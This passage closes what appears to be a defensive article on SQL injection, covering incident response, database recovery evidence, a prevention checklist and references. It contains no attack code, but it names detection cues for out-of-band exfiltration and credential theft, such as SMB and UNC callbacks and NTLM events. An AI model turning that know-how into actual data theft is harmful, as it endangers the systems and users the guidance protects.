Look for exfiltration. Check for unexpected outbound DNS and HTTP from the database host (the out-of-band channel), and read the query and audit logs for information_schema sweeps, UNION activity, and bulk reads. Do not forget the SMB path from the out-of-band discussion above: watch for outbound 445 / 139 and UNC callbacks, plus NTLM authentication events to unfamiliar hosts and any relay or hash-capture indicators, that is credential theft, not data egress alone. Scope it beyond the primary, too: the same data often lives on read replicas and followers, in warehouses and data lakes, in ETL pipelines, object-storage exports, and BI and reporting layers, any of which the attacker may have reached or which simply widen what "exposed" means.
Pull the database's own recovery evidence. Binlogs (MySQL), the WAL (PostgreSQL), and transaction logs answer "what actually changed and when" with more fidelity than application logs, and your point-in-time-restore window and backups are how you get back to a known-good state. Note their limit: these logs capture writes, not reads, so they tell you what was altered, not what was exfiltrated, that question is the audit and query logging from the exfiltration step, not the transaction log. Confirm both exist and reach back far enough before you need them, and rehearse it: a backup that has never been restored is hope, not recovery, so run restore drills so the path is known to work under pressure. Mind what a restore brings back, too: point-in-time recovery will faithfully reinstate the attacker's created users, jobs, and triggers if you restore to after they landed, so a restore has to be paired with persistence cleanup and secret rotation, or you recover the foothold along with the data. And confirm the injection path is actually patched before you reconnect normal egress and credentials, otherwise a freshly restored, clean system is re-exploited within minutes by the same queued scanner or actor that hit it the first time. Clean up downstream as well: tampered rows may already have propagated to caches, queues, search indexes, materialized views, reports, and warehouses, so restoring the database alone can leave the bad data living happily one hop away.
Scope the exposure. Identify the vulnerable parameter and every path that shares it, and, if the flaw was in a third-party product, check vendor advisories and patch status, the MOVEit pattern, where the bug was in someone else's code running in your environment.
Get ready for notification duties. With SQL injection the exposed data is often what triggers contractual, privacy, or regulatory notification obligations. Preserve the evidence above for counsel and incident response, and use it to scope who and what must be notified; that determination is far easier when the logs and change history are intact. Scope integrity impact alongside data exposure: altered balances, changed roles or permissions, modified email addresses, or tampered audit records can trigger contractual or regulatory obligations even when you cannot prove a single row was exfiltrated.

None of this is possible after the fact unless the logging and egress controls were already in place. That is why you build containment before you need it, not during the incident.

The whole thing on one card

If you keep one artifact from this piece, keep this. Each line is a section above, compressed to the thing you actually do. It is also on the downloadable fix-and-prevent cheat sheet if you would rather print it:

Build it right

Bind values. Parameterize every value, everywhere, including inside dynamic SQL and stored procedures.
Allowlist structure. Identifiers, sort, operators, and grammars map to a fixed set you defined; never trust raw input for them.
Disable emulation and multi-statements where you can, so escaping traps and stacked queries are off the table.
Constrain generated SQL. Prefer a model-emitted intent/DSL compiled by a deterministic builder; if raw SQL is unavoidable, AST-allowlist it inside a read-only sandbox and cap the session and output budget.
Test the raw-query escape hatches and pin driver config so an upgrade cannot reopen a hole.

Lock down privileges

Least privilege on the app role: no DDL, no file, no OS, scoped to its schema.
Lock down function execution. Revoke EXECUTE and PUBLIC/default grants; an unsafe function is as good as a table grant.
Separate runtime from owner, and watch SECURITY DEFINER and search_path.

Contain the blast radius

RLS and views for containment, set up correctly, so a missed query still cannot cross tenants or read what you withheld.
Expose views and APIs, not base tables. Revoke the app role's direct base-table grants so injection cannot query around the view.
Fail closed on tenant context. Missing or unset app.tenant_id returns no rows or errors, never a default tenant.
Tokenize or encrypt the highest-value fields with keys the database role cannot reach, so a successful read returns opaque bytes, not plaintext.
Control egress from the database host to kill the out-of-band exfiltration class.
Add timeouts and caps to blunt blind extraction and bulk pulls.

Detect and respond

Monitor catalog, time, and file probes, at the database and the app, not the WAF.
Preserve evidence first on an incident, before rotation wipes the answer to "what changed?"
Treat exposed secrets as burned. Invalidate sessions, force password resets, rotate tokens and keys; out-of-band and UNC paths can leak credentials as well as data.

Why a 1998 bug still runs 2026's breaches

SQL injection is the rare class we understand completely yet still cannot stamp out. The reason is not ignorance of the fix. The headline cause is that the fix is "parameterize values," and real applications must vary query shape: sorts, filters, searches, reports, and generated queries. Those are the parts parameterization cannot reach. But the survival of the bug is also operational, as this article has traced: driver defaults that drift on upgrade, privileges that creep, background jobs and second-order paths nobody tests, generated SQL from a model, and verification that never reaches the authenticated paths where it hides. Those gaps are where injection survives, and they are also the corners cut under deadline.

Step back and SQL injection and prompt injection are the same boundary failure at different layers: trusted instructions and untrusted data sharing one channel. The difference is that databases handed us a real boundary, the prepared statement, that separates the two at the protocol level, and even with that boundary in hand the bug never went away, because it does not reach the parts of SQL that have to vary. The lesson carries straight into AI security: an enforceable boundary is the best thing a platform can give you, and it only protects the places you actually use it.

References and further reading

The specifics above are drawn from the standards bodies, primary documentation, and research that define and document this class. Worth keeping close:

CISA / FBI advisory AA23-158A on the Cl0p exploitation of CVE-2023-34362 (MOVEit), including the LEMURLOOT web shell, the source for the MOVEit details here.
Rain Forest Puppy (Jeff Forristal), "NT Web Technology Vulnerabilities", Phrack #54 (1998), the first public documentation of the technique now called SQL injection.
Chris Anley, "Advanced SQL Injection in SQL Server Applications" (NGSSoftware, 2002), the foundational technical paper that mapped out exploitation depth.
CWE-89 (SQL Injection) and OWASP Top 10 A05:2025 Injection, the canonical taxonomy.
OWASP Top 10 for LLM Applications, LLM01:2025 Prompt Injection, the authoritative anchor for the generated-SQL risk and the prompt-injection parallel.
OWASP cheat sheets: SQL Injection Prevention and Query Parameterization, plus the SQL Injection attack reference.
PostgreSQL documentation: Row Security Policies and Writing SECURITY DEFINER Functions Safely, the primary source for the RLS and least-privilege containment above.
OWASP Web Security Testing Guide: Testing for SQL Injection and Testing for NoSQL Injection, the methodology behind the verification section.
PortSwigger Web Security Academy: the SQL injection labs and the DBMS-specific SQL injection cheat sheet, hands-on for the channels, dialects, and fingerprinting covered here.
sqlmap, the open-source tool that automates the detection and exploitation path described under "Automation at scale."
Justin Clarke, SQL Injection Attacks and Defense, 2nd edition (Syngress, 2012), the book-length treatment, broad and deep across databases, channels, and exploitation and defense techniques.
Chris Shiflett, "Addslashes Versus mysql_real_escape_string", the classic write-up of the GBK multibyte escaping bypass.

← All articles

What SQL injection is

Where it hides in real apps

The classic case

Breaking out of the string

Parameterize instead of sanitizing

When the response gives nothing back

Extracting data through a keyhole

Fingerprinting the engine

Cover the gaps parameterization leaves

Identifiers and syntax

Dynamic IN lists

Second-order injection

Stored procedures and ORMs are not magic

Defeating the defenses

Beating filters and WAFs

Encoding and charset tricks

The NoSQL cousin

Fix it in the configuration

From one injection to the whole machine

From query to shell

The dangerous dials by engine

Automation at scale

Anatomy of the MOVEit breach

Defenses in priority order

Modern query-feature footguns

Bulk imports, ETL, and cloud warehouses

Bulk, ETL, and import paths

Cloud warehouses and analytics engines

When a model writes the query

The escape hatches by framework

Containment architecture for when one gets through

Proving you did it

When it happens anyway

The whole thing on one card

Build it right

Lock down privileges

Contain the blast radius

Detect and respond

Why a 1998 bug still runs 2026's breaches

References and further reading